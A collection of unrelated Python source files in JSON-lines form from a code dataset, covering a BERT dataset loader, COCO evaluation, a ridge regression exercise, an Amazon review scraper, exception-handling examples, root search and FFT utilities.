tqdm(sentence_pair_data):\n tokens = data['tokens']\n invalid_tokens = set(vocab.lookup_indices(['', '', '', '']))\n candidate_index = [i for i, token in enumerate(tokens)\n if token not in invalid_tokens]\n\n # 15% of random tokens are predicted in the masked language modeling task\n num_predict = max(1, int(len(tokens) * 0.15))\n index_predict = list()\n token_predict = list()\n random.shuffle(candidate_index)\n for index in candidate_index[:num_predict]:\n if random.random() < 0.8:\n # 80% of the time: replace the word with the '' token\n masked_token = vocab['']\n elif random.random() < 0.5:\n # 10% of the time: keep the word unchanged\n masked_token = tokens[index]\n else:\n # 10% of the time: replace the word with a random word\n while True:\n masked_token = random.randint(0, len(vocab) - 1)\n if masked_token not in invalid_tokens:\n break\n \n tokens[index] = masked_token\n index_predict.append(index)\n token_predict.append(masked_token)\n\n data['tokens'] = tokens\n data['predict_index'] = index_predict\n data['predict_token'] = token_predict\n return sentence_pair_data\n\n def __getitem__(self, index):\n data = self._data[index]\n valid_len = len(data['tokens'])\n pad_len = self._max_len - valid_len\n max_num_predict = int(self._max_len * 0.15)\n predict_pad_len = max_num_predict - len(data['predict_index'])\n return {\n 'tokens': torch.tensor(data['tokens'] + [self._vocab['']] * pad_len, dtype=torch.int64),\n 'segments': torch.tensor(data['segments'] + [0] * pad_len, dtype=torch.int),\n 'pad_mask': torch.tensor([0] * valid_len + [1] * pad_len, dtype=torch.int),\n 'is_next': torch.tensor(data['is_next'], dtype=torch.int64),\n 'predict_index': torch.tensor(data['predict_index'] + [0] * predict_pad_len, dtype=torch.int64),\n 'predict_token': torch.tensor(data['predict_token'] + [0] * predict_pad_len, dtype=torch.int64),\n 'predict_mask': torch.tensor([1] * len(data['predict_index'] + [0] * predict_pad_len), dtype=torch.float)\n }\n\n def __len__(self):\n return len(self._data)\n\n def get_vocab(self):\n return self._vocab\n\n\nclass WikiText2(BertDataset):\n \"\"\"WikiText2 dataset for bert embedding training.\"\"\"\n\n def _get_raw_paragraphs(self, data_path, **kwargs):\n paragraphs = list()\n # use train split only\n for paragraph in tqdm(torchtext.datasets.WikiText2(data_path, split='train')):\n # treat . as the end of a sentence.\n lines = paragraph.strip().split(' . ')\n if len(lines) < 2:\n continue\n\n # tokenize word\n paragraph = list()\n for line in lines:\n tokens = line.strip().split()\n if tokens:\n paragraph.append(tokens + ['.'])\n\n if len(paragraph) > 1:\n paragraphs.append(paragraph)\n return paragraphs\n\n\nclass WikiText2Test(WikiText2):\n \"\"\"WikiText2 dataset for bert embedding training test.\"\"\"\n\n def _get_raw_paragraphs(self, data_path, **kwargs):\n paragraphs = super()._get_raw_paragraphs(data_path)\n logger.info(f'Randomly select 1024 pieces of data for test.')\n random.shuffle(paragraphs)\n return paragraphs[:1024]\n\n\nclass Squad2(BertDataset):\n \"\"\"Squad2 dataset for bert embedding training.\"\"\"\n\n def _get_raw_paragraphs(self, data_path, **kwargs):\n paragraphs = list()\n tokenizer = torchtext.data.utils.get_tokenizer('basic_english')\n # use train split only\n for passage, question, _, _ in tqdm(torchtext.datasets.SQuAD2(data_path, split='train')):\n passage_list = [passage]\n for char in '.!?':\n new_passage_list = list()\n for p in passage_list:\n new_p_list = p.split(char)\n for new_p in new_p_list[:-1]:\n new_p += char\n new_passage_list.extend(new_p_list)\n passage_list = new_passage_list\n paragraphs.append([tokenizer(p) for p in [question] + passage_list])\n\n return paragraphs\n\n\nDATASETS = {\n 'wikitext2_test': WikiText2Test,\n 'wikitext2': WikiText2,\n 'squad2': Squad2\n}\n\n\ndef build_bert_dataset(**kwargs):\n name = kwargs['name']\n if name in DATASETS:\n logger.info(f'Building bert dataset {name}...')\n return DATASETS[name](**kwargs)\n else:\n raise ValueError(f'Invalid bert dataset name: {name}.')\n","repo_name":"jishuguang/language","sub_path":"language/lm/dataset/bert_dataset.py","file_name":"bert_dataset.py","file_ext":"py","file_size_in_byte":9493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13552700202","text":"\n# class element:\n# def __init__(self):\n# self.name = ()\n# self.symbol = ()\n# self.mass = ()\n# self.number =()\n#\n#\n# configuration = ['1s2 2s2 2p6 3s2 3p6 4s2 3d6']\n#\n#\n#\n\nperiodic_table_dict = {1:{'name':'hydrogen','symbol':'H','mass':1.0079 } }\n","repo_name":"ProfessorKazarinoff/staticsite","sub_path":"content/code/periodic_table/periodic.py","file_name":"periodic.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"34456625541","text":"#computing a radial-basis kernel for the synthetic dataset.\nimport numpy as np\ndef radial_basis_transform(X, B, gamma=0.1):\n res=[]\n for i in range(len(X)):\n new=[]\n for j in range(len(B)): \n new.append(-gamma*((X[i]-B[j])**2))\n res.append(new)\n return np.exp(res)\n \n#training the model \n#Phi float(n, d): transformed data\n# y float(n, ): labels\n# lam float : regularization parameter\nimport numpy as np\ndef train_ridge_model(Phi, y, lam):\n a1=np.dot(Phi.transpose(),Phi)\n a2=(lam*np.identity(len(Phi.transpose()))) \n a3=np.add(a1,a2)\n res=np.linalg.inv(a3) \n return np.dot(res,np.dot(Phi.transpose(),y))\n\n#evaluating the performance on the transformed validation and test data.\nw = {} # Dictionary to store all the trained models\nvalidationErr = {} # Validation error of the models\ntestErr = {} # Test error of all the models\nlam=10**-3\nwhile lam<=10**3: # Iterate over polynomial degree\n Phi_trn = radial_basis_transform(X_trn,X_trn) # Transform training data into d dimensions\n w[lam] = train_ridge_model(Phi_trn, y_trn,lam) # Learn model on training data\n \n Phi_val = radial_basis_transform(X_val,X_trn) # Transform validation data into d dimensions\n validationErr[lam] = evaluate_model(Phi_val, y_val, w[lam]) # Evaluate model on validation data\n \n Phi_tst = radial_basis_transform(X_tst, X_trn) # Transform test data into d dimensions\n testErr[lam] = evaluate_model(Phi_tst, y_tst, w[lam]) # Evaluate model on test data\n lam=lam*10\n\n# Plot all the models -both learned and true\nplt.figure()\nplt.plot(validationErr.keys(), validationErr.values(), marker='o', linewidth=3, markersize=12)\nplt.plot(testErr.keys(), testErr.values(), marker='s', linewidth=3, markersize=12)\nplt.xlabel('Lambda', fontsize=16)\nplt.ylabel('Validation/Test error', fontsize=16)\nplt.xticks(list(validationErr.keys()), fontsize=12)\nplt.legend(['Validation Error', 'Test Error'], fontsize=16)\nplt.xscale(\"log\") \n\nplt.figure()\nplt.plot(x_true, y_true, marker='None', linewidth=5, color='k')\nlam=10**-3\nthis_list=list()\nwhile lam<=10**3:\n this_list.append(lam)\n X_lam = radial_basis_transform(x_true, X_trn)\n y_lam = X_lam @ w[lam]\n #print(w[lam])\n plt.plot(x_true, y_lam, marker='None', linewidth=2)\n lam=lam*10\nplt.legend(['true'] + this_list)\nplt.axis([-8, 8, -15, 15])\n\n#As lambda increases, linearity of model increases and vice versa.\n#minimum error is on lambda=10^-3\n#validationErr- minimum 46.160 on lambda=10^-3 \n#testErr- minimum 37.50 on lambda=10^-3 \n","repo_name":"rinkle26/MachineLearning","sub_path":"RadialBasis.py","file_name":"RadialBasis.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36608087579","text":"import copy\nimport os\nfrom argparse import ArgumentParser\nfrom multiprocessing import Pool\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\n\n\ndef _summarize(cocoEval, ap=1, iouThr=None, areaRng='all', maxDets=100 ):\n p = cocoEval.params\n iStr = ' {:<18} {} @[ IoU={:<9} | area={:>6s} | maxDets={:>3d} ] = {:0.3f}'\n titleStr = 'Average Precision' if ap == 1 else 'Average Recall'\n typeStr = '(AP)' if ap==1 else '(AR)'\n iouStr = '{:0.2f}:{:0.2f}'.format(p.iouThrs[0], p.iouThrs[-1]) \\\n if iouThr is None else '{:0.2f}'.format(iouThr)\n\n aind = [i for i, aRng in enumerate(p.areaRngLbl) if aRng == areaRng]\n mind = [i for i, mDet in enumerate(p.maxDets) if mDet == maxDets]\n if ap == 1:\n # dimension of precision: [TxRxKxAxM]\n s = cocoEval.eval['precision']\n # IoU\n if iouThr is not None:\n t = np.where(iouThr == p.iouThrs)[0]\n s = s[t]\n s = s[:,:,:,aind,mind]\n else:\n # dimension of recall: [TxKxAxM]\n s = cocoEval.eval['recall']\n if iouThr is not None:\n t = np.where(iouThr == p.iouThrs)[0]\n s = s[t]\n s = s[:,:,aind,mind]\n if len(s[s>-1])==0:\n mean_s = -1\n else:\n mean_s = np.mean(s[s>-1])\n print(iStr.format(titleStr, typeStr, iouStr, areaRng, maxDets, mean_s))\n return mean_s\n\n\ndef analyze_results(res_file,\n ann_file,\n areas=None):\n if areas:\n assert len(areas) == 3, '3 integers should be specified as areas, \\\n representing 3 area regions'\n\n cocoGt = COCO(ann_file)\n cocoDt = cocoGt.loadRes(res_file)\n imgIds = cocoGt.getImgIds()\n\n iou_type = 'bbox'\n cocoEval = COCOeval(\n copy.deepcopy(cocoGt), copy.deepcopy(cocoDt), iou_type)\n cocoEval.params.imgIds = imgIds\n if areas:\n cocoEval.params.areaRng = [[0**2, areas[2]], [0**2, areas[0]],\n [areas[0], areas[1]],\n [areas[1], areas[2]]]\n cocoEval.evaluate()\n cocoEval.accumulate()\n stats = np.zeros((10,))\n stats[0] = _summarize(cocoEval, 1)\n stats[1] = _summarize(cocoEval, 1, iouThr=.5, maxDets=cocoEval.params.maxDets[2])\n stats[2] = _summarize(cocoEval, 1, iouThr=.5, areaRng='small', maxDets=cocoEval.params.maxDets[2])\n stats[3] = _summarize(cocoEval, 1, iouThr=.5, areaRng='medium', maxDets=cocoEval.params.maxDets[2])\n stats[4] = _summarize(cocoEval, 1, iouThr=.5,areaRng='large', maxDets=cocoEval.params.maxDets[2])\n stats[5] = _summarize(cocoEval, 0, maxDets=cocoEval.params.maxDets[2])\n stats[6] = _summarize(cocoEval, 0, iouThr=.5, maxDets=cocoEval.params.maxDets[2])\n stats[7] = _summarize(cocoEval, 0, iouThr=.5, areaRng='small', maxDets=cocoEval.params.maxDets[2])\n stats[8] = _summarize(cocoEval, 0, iouThr=.5, areaRng='medium', maxDets=cocoEval.params.maxDets[2])\n stats[9] = _summarize(cocoEval, 0, iouThr=.5, areaRng='large', maxDets=cocoEval.params.maxDets[2])\n \n\n\ndef main():\n parser = ArgumentParser(description='COCO Error Analysis Tool')\n parser.add_argument('result', help='result file (json format) path')\n parser.add_argument(\n '--ann',\n default='data/coco/annotations/instances_val2017.json',\n help='annotation file path')\n parser.add_argument(\n '--areas',\n type=int,\n nargs='+',\n default=[1024, 9216, 10000000000],\n help='area regions')\n args = parser.parse_args()\n analyze_results(\n args.result,\n args.ann,\n areas=args.areas)\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"karpovaknn/defect_detection","sub_path":"tools/custom_coco_analysis.py","file_name":"custom_coco_analysis.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39605907037","text":"\"\"\"\n✔ Создайте функцию-генератор.\n✔ Функция генерирует N простых чисел,\nначиная с числа 2.\n✔ Для проверки числа на простоту используйте\nправило: «число является простым, если делится\nнацело только на единицу и на себя».\n\"\"\"\n\n\ndef is_simple(n: int) -> bool:\n if n == 2:\n return True\n devisor = 2\n while n % devisor != 0:\n devisor += 1\n return devisor == n\n\n\ndef simple_(n):\n counter, iter_ = 0, 2\n while counter < n:\n if is_simple(iter_):\n counter += 1\n tmp =iter_\n iter_+=1\n yield tmp\n else:\n iter_ += 1\n\n\ndef maim():\n n = int(input(\"n?\"))\n a = iter(simple_(n))\n m = n\n while m:\n print(next(a))\n m -= 1\n\n\nif __name__ == '__main__':\n maim()\n","repo_name":"am1bestofluck/python_insight","sub_path":"sem5/timeout_2.py","file_name":"timeout_2.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13649257687","text":"# coding:utf-8\n# 关于异常-1 Exception ZeroDivisionError\n#2021-12-05\n\ndef upper(str_data):\n new_str = 'None~' #先初始化一下字符串\n try:\n new_str = str_data.upper() #如果进入了try 就会给new_str重新赋值;如果不进入,就会转入except模块\n except Exception as e: #捕获通用异常:无法确定异常的情况下使用的捕获方法\n print('程序出错了:{}'.format(e))\n return new_str\n\nresult = upper(1) #出现异常\nprint('result:', result) #返回初始化的字符串“None~”\nprint(\"____________________________\")\ndef test():\n try:\n print('123') #这条能打出来\n 1 / 0\n print('hello') #打完123后发现有错误所以这条打不出来\n except ZeroDivisionError as e: #捕获具体异常:确定异常情况下使用的捕获方法 (这个意思是“0在python中不能被整除”)\n print(e)\n\n\ntest()\nprint(\"____________________________\")\n\ndef test1():\n try:\n print('hello')\n print(name) #name是未定义变量\n except (ZeroDivisionError, NameError) as e: #捕获多个异常的写法 要用元组形式把多个异常类型包裹起来\n print(e)\n print(type(e))\n print(dir(e))\n\ntest1()\n\nprint(\"_______________下面是多种异常类型的测试_________________\")\nclass Test(object):\n pass\n\nt = Test()\ntry:\n t.name\nexcept AttributeError as e:\n print(e)\n\nd = {'name': '小慕'}\ntry:\n d['age']\nexcept KeyError as e:\n print('没有对应的键:', e)\n\nl = [1, 2, 3]\ntry:\n l[5]\nexcept IndexError as e:\n print(e)\n\nname = 'dewei'\ntry:\n int(name)\nexcept ValueError as e:\n print(e)\n\ndef test(a):\n return a\n\ntry:\n test()\nexcept TypeError as e:\n print(e)\n","repo_name":"liujx2232/Python_Refresh","sub_path":"try_error/try_init1.py","file_name":"try_init1.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17276292253","text":"import scrapy\n\nclass CountriesSpider(scrapy.Spider): # spider class\n name = 'countries'\n allowed_domains = ['www.amazon.in'] # never add http\n start_urls = ['https://www.amazon.in/Redmi-Sky-Blue-64GB-Storage/product-reviews/B08697N43N/'] # add https\n\n\n def parse(self, response): # parse method to get response from spider\n \n \n for i in response.css(\"[data-hook=review]\"): #attibute name and its value******\n items={} #dictionary\n \n items['title']=i.css('[data-hook=\"review-title\"] span ::text').get() #extracting data from selector object\n items['review']=i.xpath('normalize-space(.//*[@data-hook=\"review-body\"])').get() #remove space by normalising \n items['star']=i.css('[data-hook=\"review-star-rating\"] span ::text').get()\n items['name']=i.css('.a-profile-name ::text').get()\n \n yield items\n\n next_page = response.xpath('//a[contains(text(),\"Next page\")]/@href').get()\n if next_page:\n yield scrapy.Request(response.urljoin(next_page))\n \n","repo_name":"tjjohn/Amazon-review-scraping","sub_path":"worldmeter/spiders/countries.py","file_name":"countries.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31313153517","text":"\"\"\" An incremental search algorithm \"\"\"\nimport pdb\nimport numpy as np\n\ndef incremental_search(f, a, b, dx):\n \"\"\"\n :param f: The function to solve\n :param a: The left boundary x-axis value\n :param b: The right boundary x-axis value\n :param dx: The incremental value in searching\n :return: The x-axis value of the root,\n number of iterations used\n \"\"\"\n fa = f(a) \n c = a + dx \n fc = f(c) \n n = 1\n\n # Just keep moving from the min until you hit zero (aka, sign changes) and return that val\n # obviously very poor solution\n while np.sign(fa) == np.sign(fc):\n if a >= b:\n return a - dx, n\n \n a = c\n fa = fc\n c = a + dx\n fc = f(c)\n n += 1\n\n # edge cases where start points are roots\n if fa == 0:\n return a, n\n elif fc == 0:\n return c, n\n else:\n # assume mid point of a and c as answer\n return (a + c)/2., n\n\nif __name__ == \"__main__\":\n \"\"\"\n The keyword 'lambda' creates an anonymous function\n with input argument x\n \"\"\"\n y = lambda x: x**3 + 2.0*x**2 - 5.\n root, iterations = incremental_search(y, -5., 5., 0.001)\n print(\"Root is:\", root)\n print(\"Iterations:\", iterations)","repo_name":"mccarvik/python_for_finance","sub_path":"books/mastering_pff/ch3/incremental_search.py","file_name":"incremental_search.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"26407352030","text":"'''\nRoutines for real-to-complex and complex-to-real FFTs. Adapted from pixell and mnms.\nBut differ at some critical point, mainly in the defintion of the flat sky lx.\n'''\nimport numpy as np\nfrom scipy.interpolate import interp1d\n\nimport ducc0\nfrom pixell import enmap, wcsutils\n\nfrom optweight import type_utils, mat_utils\n\ndef rfft(imap, fmap):\n '''\n Real-to-complex FFT.\n\n Parameters\n ----------\n imap : (..., ny, nx) ndmap\n Map to transform.\n fmap : (..., ny, nx//2+1) complex ndmap\n Output buffer.\n\n Raises\n ------\n ValueError\n If input and output map have inconsistent shapes.\n '''\n\n ny, nx = imap.shape[-2:]\n if fmap.shape != imap.shape[:-2] + (ny, nx // 2 + 1):\n raise ValueError(\n f'Inconsistent shapes: imap : {imap.shape}, fmap : {fmap.shape}')\n if fmap.dtype != type_utils.to_complex(imap.dtype):\n raise TypeError(\n f'imap.dtype : {imap.dtype} and fmap.dtype : {fmap.dtype} do not match')\n \n ducc0.fft.r2c(np.asarray(imap), axes=[-2, -1], inorm=1, out=np.asarray(fmap),\n nthreads=0)\n\ndef irfft(fmap, omap):\n '''\n Complex-to-real FFT.\n\n Parameters\n ----------\n fmap : (..., ny, nx//2+1) complex ndmap\n Input Fourier coefficients.\n omap : (..., ny, nx) ndmap\n Output buffer.\n\n Raises\n ------\n ValueError\n If input and output map have inconsistent shapes.\n '''\n\n ny, nx = omap.shape[-2:]\n if fmap.shape != omap.shape[:-2] + (ny, nx // 2 + 1):\n raise ValueError(\n f'Inconsistent shapes: fmap : {fmap.shape}, omap : {omap.shape}')\n if fmap.dtype != type_utils.to_complex(omap.dtype):\n raise TypeError(\n f'omap.dtype : {omap.dtype} and fmap.dtype : {fmap.dtype} do not match')\n\n ducc0.fft.c2r(np.asarray(fmap), axes=[-2, -1], forward=False, inorm=1,\n lastsize=omap.shape[-1], out=np.asarray(omap), nthreads=0)\n \ndef allocate_fmap(shape, dtype, fill_value=0):\n '''\n Allocate an array suitable for the output of rfft.\n\n Parameters\n ----------\n shape : tuple\n Input shape of enmap.\n dtype : type, optional\n Type of input map.\n fill_value : scalar, optional\n Value to fill new array with.\n\n Returns\n -------\n omap : (..., ny, nx//2+1) complex array\n New array for 2D Fourier coefficients.\n '''\n \n preshape = shape[:-2]\n ny, nx = shape[-2:]\n\n return np.full(preshape + (ny, nx // 2 + 1), fill_value, \n dtype=type_utils.to_complex(dtype))\n\ndef allocate_map(fshape, dtype, fill_value=0):\n '''\n Allocate an array suitable for the output of irfft.\n\n Parameters\n ----------\n shape : tuple\n Input shape of fmap: (..., ly, lx).\n dtype : type, optional\n Type of input fmap.\n fill_value : scalar, optional\n Value to fill new array with.\n\n Returns\n -------\n omap : (..., ly, 2 * (lx -1) + 1) complex array\n New array.\n\n Notes\n -----\n This always results in an array with an odd-length. From the\n shape of the fmap it is unknown if the input map was even or odd\n in the x direction.\n '''\n \n preshape = fshape[:-2]\n ly, lx = fshape[-2:]\n\n return np.full(preshape + (ly, 2 * (lx - 1) + 1), fill_value, \n dtype=type_utils.to_real(dtype))\n\ndef laxes_real(shape, wcs):\n '''\n Compute ell_x and ell_y axes corresponding to a given enmap geometry.\n\n Arguments\n ---------\n shape : tuple\n Shape of geometry.\n wcs : astropy.wcs.WCS object\n WCS object describing geometry.\n\n Returns\n -------\n ly : (nly) array\n Wavenumbers in y direction.\n lx : (nlx) array\n Wavenumbers in x direction.\n\n Notes\n -----\n This definition differs from the one used in pixell and mnms. We \n attempt no correction for sky curvature. Our `ly` only matches up \n with the harmonic `m` on the equator of a cylindrical pixelization.\n '''\n\n step = np.radians(wcs.wcs.cdelt[::-1])\n ly = np.fft.fftfreq(shape[-2], step[0]) * 2 * np.pi\n lx = np.fft.rfftfreq(shape[-1], step[1]) * 2 * np.pi\n\n return ly, lx\n\ndef laxes2lmap(ly, lx, dtype=np.float64):\n '''\n Return maps of all the wavenumbers corresponding to a given enmap geometry.\n\n Arguments\n ---------\n ly : (nly) array\n Wavenumbers in y direction.\n lx : (nlx) array\n Wavenumbers in x direction.\n\n Returns\n -------\n lmap : (2, nly, nlx) array\n Maps of ell_y and ell_x wavenumbers.\n '''\n\n lmap = np.empty((2, ly.size, lx.size), dtype=dtype)\n lmap[0] = ly[:,np.newaxis]\n lmap[1] = lx[np.newaxis,:]\n\n return lmap\n\ndef lmap_real(shape, wcs, dtype=np.float64):\n '''\n Return maps of all the wavenumbers corresponding to a given enmap geometry.\n\n Arguments\n ---------\n shape : tuple\n Shape of geometry.\n wcs : astropy.wcs.WCS object\n WCS object describing geometry.\n dtype : type, optional\n Type of ouput array.\n\n Returns\n -------\n lmap : (2, nly, nlx) array\n Maps of ell_y and ell_x wavenumbers.\n '''\n\n ly, lx = laxes_real(shape, wcs)\n return laxes2lmap(ly, lx, dtype=dtype)\n\ndef laxes2modlmap(ly, lx, dtype=np.float64):\n '''\n Return a map of all the abs wavenumbers in the fourier transform\n of a map with the given shape and wcs.\n\n Arguments\n ---------\n ly : (nly) array\n Wavenumbers in y direction.\n lx : (nlx) array\n Wavenumbers in x direction.\n dtype : type, optional\n Type of ouput array.\n\n Returns\n -------\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n '''\n \n lmap = laxes2lmap(ly, lx, dtype=dtype)\n return np.sum(lmap ** 2, axis=0) ** 0.5\n \ndef modlmap_real(shape, wcs, dtype=np.float64):\n '''\n Return a map of all the abs wavenumbers in the fourier transform\n of a map with the given shape and wcs.\n\n Arguments\n ---------\n shape : tuple\n Shape of geometry.\n wcs : astropy.wcs.WCS object\n WCS object describing geometry.\n dtype : type, optional\n Type of ouput array.\n\n Returns\n -------\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n '''\n\n ly, lx = laxes_real(shape, wcs)\n return laxes2modlmap(ly, lx, dtype=dtype)\n\ndef lwcs_real(shape, wcs):\n '''\n Build world coordinate system for Fourier space (with reality symmetry) given\n enmap geometry.\n\n Arguments\n ---------\n shape : tuple\n Shape of geometry.\n wcs : astropy.wcs.WCS object\n WCS object describing geometry.\n\n Returns\n -------\n lwcs : astropy.wcs.WCS object\n WCS object describing Fourier space geometry.\n '''\n\n lres = 2 * np.pi / (np.radians(wcs.wcs.cdelt[::-1]) * shape[-2:])\n lres[-1] = abs(lres[-1])\n ny = shape[-2]\n \n return wcsutils.explicit(crpix=[0,ny//2+1], crval=[0,0], cdelt=lres[::-1])\n\ndef lbin(fmap, modlmap, bsize=None):\n '''\n Bin Fourier-space map into radial bins.\n \n Arguments\n ---------\n fmap : (..., nly, nlx) array.\n Input 2D Fourier map.\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n bsize : float, optional\n Radial bin size. Defaults to resolution in ell of input map.\n\n Returns\n -------\n fbin : (..., nbin) array\n Radially binned input.\n bins : (nbin) array\n Bins.\n '''\n\n if bsize is None:\n bsize = min(abs(modlmap[0,1]), abs(modlmap[1,0]))\n\n return enmap._bin_helper(fmap, modlmap, bsize)\n\ndef fmul(fmap, fmat2d=None, fmat1d=None, ells=None, modlmap=None,\n out=None):\n '''\n Compute f'[...,i,ly,lx] = m[i,j,ly,lx] f[...,j,ly,lx] matrix\n multiplication.\n \n Parameters\n ----------\n fmap : (..., nly, nlx) complex array.\n Input 2D Fourier map.\n fmat2d : (npol, npol, nly, nlx) or (npol, nly, nlx) array, optional\n Matrix, if diagonal only the diagal suffices.\n fmat1d : (npol, npol, nell) or (npol, nly, nell) array, optional\n Matrix, if diagonal only the diagal suffices.\n ells : (nell) array, optional\n Array with multipoles, can be non-integer, needed for `fmat1d`.\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers, needed for `fmat1d`.\n out : (..., nly, nlx) array, optional\n Output array.\n\n Returns\n -------\n out : (..., nly, nlx) complex array\n Result from matrix multiplication.\n '''\n \n if fmat2d is not None and fmat1d is not None:\n raise ValueError('Cannot have both fmat2d and fmat1d')\n\n if fmat1d is not None:\n fmat2d = cl2flat(fmat1d, ells, modlmap)\n \n return fmul_2d(fmap, fmat2d, out=out)\n\ndef fmul_2d(fmap, fmat2d, out=None):\n '''\n Compute f'[...,i,ly,lx] = m[i,j,ly,lx] f[...,j,ly,lx] matrix\n multiplication.\n \n Parameters\n ----------\n fmap : (npol, nly, nlx) complex array\n Input array.\n fmat2d : (npol, npol, nly, nlx) or (npol, nly, nlx) array\n Matrix, if diagonal only the diagal suffices.\n out : (npol, nly, nlx) complex array, optional\n Output array. Will be overwritten!\n\n Returns\n -------\n out : (npol, nly, nlx) complex array\n Output array.\n '''\n \n fmap = mat_utils.atleast_nd(fmap, 3)\n npol = fmap.shape[0]\n nly, nlx = fmap.shape[-2:]\n\n if out is None:\n out = fmap.copy()\n else:\n out[:] = fmap \n\n if fmat2d.ndim in (2, 3):\n out *= fmat2d\n else:\n out = np.einsum('ablk, blk -> alk', fmat2d, out,\n out=out, optimize=True)\n \n return out\n\ndef cl2flat(c_ell, ells, modlmap):\n '''\n Interpolate a 1d function of multipole to a 2D map of Fourier\n coefficients.\n\n Parameters\n ---------- \n c_ell : (..., nell) array\n Input power spectrum.\n ells : (nell) array\n Multipoles, can be non-integer.\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n\n Returns\n -------\n out : (npol, nly, nlx) complex array\n 2D output array. \n \n Raises\n ------\n ValueError\n If input has to be extrapolated more than 5 ell bins.\n '''\n\n # Extrapolate the input to the output using nearest neighbor.\n # This makes sure we don't change signs etc and turn a PSD\n # matrix into a non-PSD matrix. A bit ugly, but better safe\n # than sorry.\n\n lmin_out = modlmap.min()\n lmax_out = modlmap.max()\n\n ell_start, ell_end = [], []\n if ells[0] > lmin_out:\n ell_start = np.asarray([lmin_out])\n c_ell_start = c_ell[...,0]\n c_ell = np.concatenate((c_ell_start[...,np.newaxis], c_ell), axis=-1)\n if ells[-1] < lmax_out:\n ell_end = np.asarray([lmax_out])\n c_ell_end = c_ell[...,-1]\n c_ell = np.concatenate((c_ell, c_ell_end[...,np.newaxis]), axis=-1)\n ells = np.concatenate((ell_start, ells, ell_end)) \n\n out = np.zeros(c_ell.shape[:-1] + modlmap.shape,\n dtype=type_utils.to_complex(c_ell.dtype))\n cs = interp1d(ells, c_ell, kind='linear', assume_sorted=True,\n bounds_error=True)\n\n return cs(modlmap).astype(c_ell.dtype, copy=False)\n\ndef calc_ps1d(fmap, wcs, modlmap, fmap2=None, bsize=None):\n '''\n Calculate 1D power spectrum from set of Fourier\n coefficients.\n \n Parameters\n ----------\n fmap : (..., nly, nlx) complex array\n Input 2D Fourier map.\n wcs : astropy.wcs.WCS object\n WCS object describing geometry of original map.\n modlmap : (nly, nlx) array\n Map of absolute wavenumbers.\n fmap2 : (..., nly, nlx) complex array, optional\n Second 2D Fourier map for cross-correlation.\n bsize : float, optional\n Radial bin size. Defaults to resolution in ell of input map.\n \n Returns\n -------\n ps1d : (..., nbin) array\n Radially binned 1D power spectrum.\n bins : (nbin) array\n Bins.\n '''\n\n fmap = enmap.enmap(fmap, wcs=wcs, copy=False)\n if fmap2:\n fmap2 = enmap.enmap(fmap2, wcs=wcs, copy=False)\n\n ps2d = enmap.calc_ps2d(fmap, harm2=fmap2)\n return lbin(ps2d, modlmap, bsize=bsize)\n \ndef contract_fxg(fmap, gmap):\n '''\n Return sum_{ly lx} f_{ly lx} x conj(f_{ly lx}), i.e. the sum of the Hadamard\n product of two sets of 2D Fourier coefficients corresponding to real fields.\n\n Parameters\n ----------\n fmap : (..., nly, nlx) complex array\n Input 2D Fourier map.\n gmap : (..., nly, nlx) complex array\n Input 2D Fourier map.\n\n Returns\n -------\n had_sum : float\n Sum of Hadamard product (real valued).\n\n Raises\n ------\n ValueError\n If input arrays have different shapes. \n '''\n \n if fmap.shape != gmap.shape:\n raise ValueError(\n f'Shape fmap ({fmap.shape}) != shape gmap ({gmap.shape})')\n\n gmap = np.conj(gmap)\n csum = complex(np.tensordot(fmap, gmap, axes=fmap.ndim))\n had_sum = 2 * csum\n \n had_sum -= np.sum(fmap[...,:,0] * gmap[...,:,0])\n\n # If nx is even we also have to subtract the last column.\n # How to determine if input nx was odd or even? We need to \n # check if the last element of the first row is real.\n # If ny is also even, we can additionally check if the \n # last element of the middle row is also even.\n\n nx_even = np.all(np.isreal(fmap[...,0,-1]))\n ny = fmap.shape[-2]\n if ny % 2 == 0: \n nx_even &= np.all(np.isreal(fmap[...,ny//2,-1]))\n\n if nx_even: \n had_sum -= np.sum(fmap[...,:,-1] * gmap[...,:,-1])\n\n return np.real(had_sum)\n\ndef slice_fmap(fmap, slices_y, slice_x, laxes=None):\n '''\n Return map of 2D fourier coefficients that is cut out from input map.\n\n Parameters\n ----------\n fmap : (..., ny, nx) array\n Input 2D Fourier coefficients.\n slices_y : tuple of slices\n Two slices that slice select nonzero positive frequences and nonzero\n negaive frequencies.\n slice_x : slice\n Slice with nonzero elements in the x direction\n laxes : tuple of (ny) array and (nx) array, optional\n ly and lx coordinates of input coefficients.\n\n Returns\n -------\n fmap_out : (ny', nx') array\n Output coefficients. New C-contigous array (i.e. not a view of input).\n laxes_out : tuple of (ny') array and (nx') array\n ly and lx coordinates of output. Only if `laxes` was provided.\n '''\n\n pos_part = fmap[...,slices_y[0],slice_x]\n neg_part = fmap[...,slices_y[1],slice_x]\n\n out = np.concatenate((pos_part, neg_part), axis=-2)\n \n if laxes is not None:\n ly, lx = laxes\n lx_new = lx[slice_x]\n ly_new = np.concatenate((ly[slices_y[0]], ly[slices_y[1]]))\n out 